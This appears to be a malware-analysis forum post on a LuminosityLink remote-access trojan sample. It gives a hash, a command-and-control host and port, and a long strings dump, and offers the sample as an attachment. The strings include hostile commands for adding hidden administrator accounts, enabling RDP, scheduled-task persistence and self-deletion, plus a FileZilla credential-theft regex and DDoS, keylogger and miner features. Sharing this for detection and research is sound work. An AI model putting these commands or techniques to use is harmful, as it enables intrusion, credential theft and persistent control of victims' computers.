http://researchcenter.paloaltonetworks. ... iguration/
Very low detection rate 2/53:
cb599999063da4b3113b0b8dbefd39ec
Connects to:
mopol.mooo.com:8485 --> [212.7.208.101]
Strings:
Very low detection rate 2/53:
cb599999063da4b3113b0b8dbefd39ec
Connects to:
mopol.mooo.com:8485 --> [212.7.208.101]
Strings:
Code: Select all
Attached sample + sort of unpack (not really, .NET code is obfuscated)RELPATH
SHADOW_COPY_DIRS
CACHE_BASE
PRIVATE_BINPATH
DYNAMIC_BASE
APP_CONFIG_FILE
APP_NAME
APPBASE
APP_CONFIG_BLOB
BINPATH_PROBE_ONLY
CODE_DOWNLOAD_DISABLED
DEV_PATH
DISALLOW_APP
DISALLOW_APP_REDIRECTS
DISALLOW_APP_BASE_PROBING
FORCE_CACHE_INSTALL
config\machine.config
MACHINE_CONFIG
HOST_CONFIG
( )
resource
System.EnterpriseServices.IRemoteDispatch
System.EnterpriseServices
nJsx
Xtz
count
index
"<>|
"<>|
"<>|
:*?\/
file:
http:
\\?\globalroot
*AllFiles*
*AllLocalFiles*
9I
Q8?
Q8?
System.Security.Permissions.IUnrestrictedPermission
l_intl.nlp
length
capacity
l_except.nlp
P?I
^$^
d, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
NLS
SER
DYNIL
REMOTE
BINARY
SOAP
REMOTINGCHANNELS
CACHE
RESMGRFILEFORMAT
PERF
CORRECTNESS
MEMORYFAILPOINT
$H
8$H
P$H
l$H
L%H
h%H
d.Resources
bytes
chars
charCount
charIndex
t(H
Q8?
t(H
-PZ
SMARTLOGS
8*I
name
nT)H
cultureName
culture.nlp
uX4HcE/7iL0AmtYmMOgBtkLdvJcWeXYjDUmbuE231fTnQ85NB73MqttiCb0OSU2q5vrQeH0r0qytJrPw+4dCGiTQuSbg+rxPixrGsdSxvzMlhRiJpo6h01wpS6s3cQiuhq5BvPFZE/qBAzNe74E5GXY9Z+rUFGy4L8k86OX2mLA0M/dF08ue+MUHgspbaJ6xyn8hCLSmPHACnOxigydMAg==
Desktop
Programs
Personal
MyDocuments
Favorites
Startup
Recent
SendTo
StartMenu
MyMusic
DesktopDirectory
MyComputer
Templates
ApplicationData
LocalApplicationData
InternetCache
Cookies
History
CommonApplicationData
System
ProgramFiles
MyPictures
CommonProgramFiles
n(JH
dIH
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
System.Void
System\CurrentControlSet\Control\Lsa
FIPSAlgorithmPolicy
Property can only be set to Nothing
WinForms_RecursiveFormCreate
WinForms_SeeInnerException
ARMEg
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
HTTP
BW Flood
http://
www.
StressTest
Attack on
started!
UDP
Connect/Disconnect
HTTP GET
HTTP POST
Slowloris
HTTP TIMEOUT&
finished successfully. Attacks Sent:
aborted successfully. Attacks Sent:
HEAD / HTTP/1.1
Host:
Content-length: 5235
User-Agent:
POST / HTTP/1.1
Host:
GET / HTTP/1.1
Host:
user-agent
udp
condis
httpget
posthttp
slowloris
arme
bwflood
SPECS
TCP
KILLPROC
BOTKILL
ADDHOST
BKFILE
FWFILE
SCLEAN
DELREG
Once
_CU
PRC
HOSTS
SETHOST
SWP
CLIP
N/A
SETCLIP
SHELL
STARTSHELL
DELFILE
STOPSHELL
RESTARTSHELL
WND
SWLIB
RWND
CWND
LDIR
REG
DEL
EXE
ZIP
ClientHandler
*.*
UserProfile
FLOC
Shell.Application
NameSpace
CopyHere
Items
FMC
FMDEL
Regedit
LOG
ManageWindow
ALLUSERSPROFILE
\Microsoft\Windows\Start Menu\Programs\Startup
.ini
STARTMAN
cManager
length
ProcessKill
Killed Process:
Unable to Kill Process:
. Error:
0.00
TaskMgr
netstat
-ano
SYSTEM
=*&
DLSpeed
cmd.exe
C:\
Session Ended
.log
QUEUEFILE
|
DECIDE
Queued
Bytes
D_=*
USERPROFILE
PROGRAMFILES
APPDATA
TEMP
DESKTOP
DOCUMENTS
PICTURES
EVERYTHING
SystemDrive
.exe
ProgramData
Logs\
Files\
Guard\
.jar
.INJ
.ENC
PWD
Guard
No Files Guarded
Removed Guarded File:
Error:
Guarding File:
SmartUpdate
Cannot Continue because Luminosity is injected into a third party process!
Unable to download file:
Client will be updated after a reboot!
HTTPControl
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
1314591
DOWNLOAD
UPDATE
UPDATEDNS
BackupDNS
UNINSTALL
Miner
STOP
CPUTHREADS
LuminosityCryptoMiner
Installed Miner:
Error
Could not Inject Miner! Check your config!
AllCPU
HALFCPU
ALLBUT1
HH:mm:ss
M03
mDown
mUp
START
TYP3
STARTDESK
rDesktop
===D~
image/jpeg
Installing
net user
/DELETE
Deleted User Account:
net user /add
Administrators
S-1-5-32-544
net localgroup
/add
User Added Successfully:
SOFTWARE\MICROSOFT\WINDOWS NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Changed Password for
to
Uninstalling
Command Handler Error:
x86
HOMEDRIVE
\Windows\Sysnative\rdpwrap.dll
\rdpwrap.dll
Error RDP Status:
RDP
STATUS=
Error Getting RDP Status:
LOG=
Error Managing RDP:
\Windows\Sysnative\rdpwrap.ini
\rdpwrap.ini
taskkill /f /fi
services eq TermService
net start TermService
net start DnsCache
net start CryptSvc
net start LanmanWorkstation
net start NlaSvc
Updated RDP Successfully!
RDP Manager...
-i -s
RDP Manager Installed Successfully!
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f/
Error Installing RDP Manager! Please try again!
Error Injecting RDP Manager
Error Installing RDP: Invalid File Download
Error Installing RDP: Something went wrong! Try again.
RegAsm.exe
vbc.exe
Elevation
Cannot elevate while injected into a process
/c
runas
User Denied Elevation!
Win32_UserAccount
Name
ACCOUNT=
.wav&
open new Type waveaudio Alias recsound
record recsound
save recsound
close recsound
AUDIO
STARTAUDIO
CFRAME
STARTCAM
DONE
INCFILE
Started
BYT3S
WRITEFILE
MM-dd-yyyy
SmartLogger
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
Speech
SAPI.Spvoice
speak
Shell
Shutdown
shutdown /s
Reboot
shutdown /r
Logoff
shutdown /l
Hibernate
shutdown /h /f
MonitorOn
MonitorOff
CMDOn
DisableCMD
CMDOff
RegeditOn
DisableRegistryTools
RegeditOff
SwapMouse
ResetMouse
ShowDesktop
Program Manager
HideDesktop
ShowTaskBar
HideTaskBar
EjectDisk
set CDAudio door open
CloseDisk
set CDAudio door closed
TaskmgrOn
DisableTaskMgr
TaskmgrOff
DelRestore
EnableInput
DisableInput
\\.\root\default
systemrestore
sequencenumber
Shell_traywnd
=()=
TR4MP
Removed
Blacklist
AntiProc
PASSWORDS
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
AntiMalware
Malware Cleaner: Processes Removed:
. Startup Items Removed:
Malware Cleaner cannot run when installation is disabled!
PROGRAMDATA
Luminosity
^$^
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Debugger
C:\Windows\System32\svchost.exe
LuminosityLink is Running
Uninstall
BID
Global\ $
\Windows\Sysnative\drivers\etc\hosts
CONNECT
1.5.1
Updating
Executed File
DownloadFile
ACT
RECONNECT
GETLOGS
KEYLOGS
READLOG
SAVELOG
DESK
WEBCAM
MANAGER
MICROPHONE
GUARDFILE
REMOVEGUARD
STARTCHAT
LISTGUARD
EMAILS
E471LE471L
GetSpecificInfo
VISIT
DELETE
KILLFILE
CHATMSG
MSGBOX
STARTPROXY
STOPPROXY
FILEDONE
OPEN
Transfer
STOPDDOS
ddos
SEARCHFILE
ENCFILE
QUEUE
MALCLEAN
HARDMALCLEAN
SEARCHLOGS
FUNCTIONS
SMARTUPDATE
UPLOADFILE
RND
YES
ExecutedFile
SavedFile
AMAL*
Proactive Anti-Malware has been activated!
Proactive Anti-Malware could Not be enabled because this client does Not use Luminosity's startup!
DMAL)
Proactive Anti-Malware has been disabled!
Proactive Anti-Malware could not be disabled because this client does not use Luminosity's startup!
SCRIPT
Script
MainError
Inj
RING
URALYA
FUCKUP
directshow
Load
InternetExplorer.Application
navigate2
Visible
Website
Opened:
True
Speed
Download Speed:
CPU
GPU
RAM
Sec
. Firewall:
Uptime
Window
Location
O.S
IDLE
Idle Time:
IND
CLIENTINFO
http://cachefly.cachefly.net/5mb.test
KB/sec
50Mbit+
Failed
NoSystemBattery
N/A (Desktop Machine)
###,###,##0 GB
Win32_Processor.deviceid="CPU0"
SELECT * FROM Win32_VideoController
\root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
SELECT * FROM FirewallProduct
System
System Up Time
Day(s)
Hours
Minutes
SOFTWARE
=P4CK3T=
8_=_8
\drivers\etc\hosts
netsh advfirewall firewall add rule name=
dir=out action=block program=
enable=yes
ms.ini
root\CIMV2
Description
virtual
vmware
parallel
vm additions
remotefx
generic
cirrus logic
standard vga
matrox
Desktop
Laptop
MessageBox
==================================================
EPWD
E471L
Email
Server
Email
Password
|P4$$
EmailRecovery
Invalid Email Password Recovery Download URL
PassRecovery&
Invalid Password Recovery Download URL
K3Y3,
SOFTWARE\Microsoft\Windows NT\CurrentVersion
DigitalProductId#
SELECT * FROM Win32_OperatingSystem
OSArchitecture
AppData
\FileZilla\recentservers.xmlK
<Host>(.+?)</Host>\s+.+\s+.+\s+.+\s+<User>(.+?)</User>\s+<Pass>(.+?)</Pass>
F4Z3Z1LLA
Z14L1
CHR0M3
URL
URL
User Name
Password
/stext "{0}"
csc.exe
AppLaunch.exe
chatBox
inputBox
rChat
Chat with
You:
DIE
"{0}"
d.Resources
CAM
CONFIG
RUNPE
SMARTLOGS
XML
" -a /a
schtasks /create /sc onlogon /tn
/rl highest /tr "'
' /startup" /f
%i%
%path%
schtasks /create /TN
/XML "
" /f6
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Userinit
userinit.exe,"
shell
explorer.exe,"
:Zone.Identifier
.config
/C ping 1.1.1.1 -n 1 -w
> Nul & Del "
EVERYONE
Process Manager
PTH
MTX
csrss
lsass
D4T4
DISCONNECT
CONNECTRESPONSE
SOCKS5
Server is already running!
PROXY
mopol.mooo.com
8485
client.exe
Client Monitor
Client
Monitor
clientmonitor.exe
59957fb1c88ac81ef84ff2c600ca6bd6f6f23495ed9cf62fcd7ac3d2213b1ad1
HOME
1sn
vH7B
NaN
Infinity
-Infinity
-Infinity
Infinity
http
https
ftp
file
gopher
nntp
news
mailto
uuid
telnet
ldap
net.tcp
net.pipe
vsmacros
0123456789ABCDEF
0123456789abcdef
00000000-0000-0000-C000-000000000046
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_CURRENT_USER\SOFTWARE
HOME-2342345
8;H
L;H
:H
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
True
False
ArgumentNull_Generic
[Resource lookup failed - null or empty resource name]
[Resource lookup failed - infinite recursion or critical failure detected.]
C:\ProgramData\Client\
C:\Users\Cris\AppData\Roaming\Monitor\
C:\Users\Cris\AppData\Roaming\Monitor\Logs\
C:\Users\Cris\AppData\Roaming\Monitor\Files\
C:\Users\Cris\AppData\Roaming\Monitor\Guard\
AccessControl_MustSpecifyLeafObjectAcl
AccessControl_MustSpecifyContainerAcl
AccessControl_MustSpecifyNonDirectoryObjectAcl
AccessControl_MustSpecifyDirectoryObjectAcl
AccessControl_InvalidOwner
AccessControl_InvalidGroup
AccessControl_UnexpectedError
Argument_InvalidName
AccessControl_NoAssociatedSecurity
AccessControl_InvalidHandle
SeSecurityPrivilege
System.Diagnostics.Trace.CorrelationManagerSlot
x1I
TcpClient
maxdatasize
tracemode
System.Configuration.Internal.ConfigurationManagerInternal, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
system.diagnostics
level
\?:*"<>|
codepages.nlp
NLS_CodePage_{0}_{1}_{2}_{3}_{4}
args
format
-Infinity
Infinity
C:\Windows\Sysnative\drivers\etc\hosts
51372AE0-CAE7-11CF-BE81-00AA00A2FA25
000001ce-0000-0000-C000-000000000046
path2
path1
C:\Users\Cris\AppData\Roaming\Monitor\Guard\1
Q8?
GetType
GetHashCode
Q8?
RemoteActivationService.rem
property name
prop
LeaseLifeTimeServiceProperty
soap:
http://sch
C:\Users\Cris\AppData\Roaming\Monitor\Guard\1
dII
C:\Users\Cris\AppData\Roaming\Monitor\Guard\1
PLI
\JI
|JI
n\MI
QOn
Put
Delete
Get
\wminet_utils.dll
ResetSecurity
SetSecurity
BlessIWbemServices
BlessIWbemServicesObject
GetPropertyHandle
WritePropertyValue
Clone
VerifyClientKey
GetQualifierSet
GetNames
BeginEnumeration
Next
EndEnumeration
GetPropertyQualifierSet
GetObjectText
SpawnDerivedClass
SpawnInstance
CompareTo
GetPropertyOrigin
InheritsFrom
GetMethod
PutMethod
DeleteMethod
BeginMethodEnumeration
NextMethod
EndMethodEnumeration
GetMethodQualifierSet
GetMethodOrigin
QualifierSet_Get
QualifierSet_Put
QualifierSet_Delete
QualifierSet_GetNames
QualifierSet_BeginEnumeration
QualifierSet_Next
QualifierSet_EndEnumeration
GetCurrentApartmentType
GetDemultiplexedStub
CreateInstanceEnumWmi
CreateClassEnumWmi
ExecQueryWmi
ExecNotificationQueryWmi
PutInstanceWmi
PutClassWmi
CloneEnumWbemClassObject
ConnectServerWmi
CAttachments
pass: infected
(1.24 MiB) Downloaded 94 times
(1.24 MiB) Downloaded 94 times
